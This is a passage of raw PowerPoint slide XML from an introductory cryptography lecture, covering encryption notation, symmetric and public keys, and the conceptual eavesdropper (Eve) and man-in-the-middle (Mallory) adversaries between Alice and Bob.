              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18466" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="4114800"/>
            <a:ext cx="3429000" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Message sent is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>C= E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>K1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(P)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Decrypted as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>P=D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>K2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(C)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>P is called plaintext.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>C is called ciphertext.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18467" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="4143376"/>
            <a:ext cx="2698750" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Symmetric Key: K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>=K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Public Key: K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Math1Mono"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>≠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is publicly known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is Bob’s secret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4343400" y="2835276"/>
            <a:ext cx="0" cy="669925"/>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8" name="Oval 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8839200" y="2276915"/>
            <a:ext cx="2443316" cy="655259"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="475946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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{040CEFCB-C465-480A-84E0-18235AC8F17A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088571" y="228600"/>
            <a:ext cx="9538154" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adversaries and their discontents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20485" name="Oval 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1171576" y="2621383"/>
            <a:ext cx="2181224" cy="69873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486" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114801" y="2695059"/>
            <a:ext cx="1098550" cy="369332"/>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487" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010401" y="2695059"/>
            <a:ext cx="1142993" cy="478870"/>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488" name="Oval 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8839200" y="2595769"/>
            <a:ext cx="2181222" cy="700900"/>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489" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5746750" y="1923813"/>
            <a:ext cx="1600200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Eve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20490" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2955925"/>
            <a:ext cx="762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491" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8153400" y="2940050"/>
            <a:ext cx="6858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492" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="2822999"/>
            <a:ext cx="1447800"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20493" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2955925"/>
            <a:ext cx="17526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494" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5616575" y="297180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sp>
        <p:nvSpPr>
          <p:cNvPr id="20495" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6096000" y="2346326"/>
            <a:ext cx="0" cy="593725"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20496" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="2725738"/>
            <a:ext cx="958850" cy="366712"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20497" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7070725" y="2711451"/>
            <a:ext cx="971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Decrypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20498" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2025651"/>
            <a:ext cx="6794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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20499" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9315450" y="1873251"/>
            <a:ext cx="590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Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20500" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9057046" y="2781737"/>
            <a:ext cx="1703189"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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20501" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1447801"/>
            <a:ext cx="3505200" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Wiretap Adversary (Eve)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20502" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4019490"/>
            <a:ext cx="8229600" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Man in the Middle Adversary (Mallory)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20503" name="Oval 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1183152" y="5218308"/>
            <a:ext cx="2070100" cy="74140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504" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733801" y="5301733"/>
            <a:ext cx="1184274" cy="614359"/>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505" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162801" y="5317609"/>
            <a:ext cx="1142998" cy="576764"/>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506" name="Oval 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8839200" y="5176043"/>
            <a:ext cx="2229360" cy="74782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507" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="5377934"/>
            <a:ext cx="1295400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20508" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="5410200"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20509" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3294925" y="5562601"/>
            <a:ext cx="4572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0" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8305800" y="5562600"/>
            <a:ext cx="5334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1" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1545317" y="5419765"/>
            <a:ext cx="1555751"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20512" name="Line 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="5562600"/>
            <a:ext cx="5334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3" name="Text Box 47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="5334001"/>
            <a:ext cx="9588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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20514" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7223125" y="5334001"/>
            <a:ext cx="971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Decrypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20515" name="Text Box 49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="4572001"/>
            <a:ext cx="6794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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20516" name="Text Box 50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9372600" y="4648201"/>
            <a:ext cx="590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Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20517" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9233410" y="5361244"/>
            <a:ext cx="1835149"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20518" name="Line 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="5562600"/>
            <a:ext cx="4572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9" name="Text Box 53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="586740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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Straight Connector 44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3733800"/>
            <a:ext cx="9144000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Straight Connector 46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="6246812"/>
            <a:ext cx="9144000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Connector 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
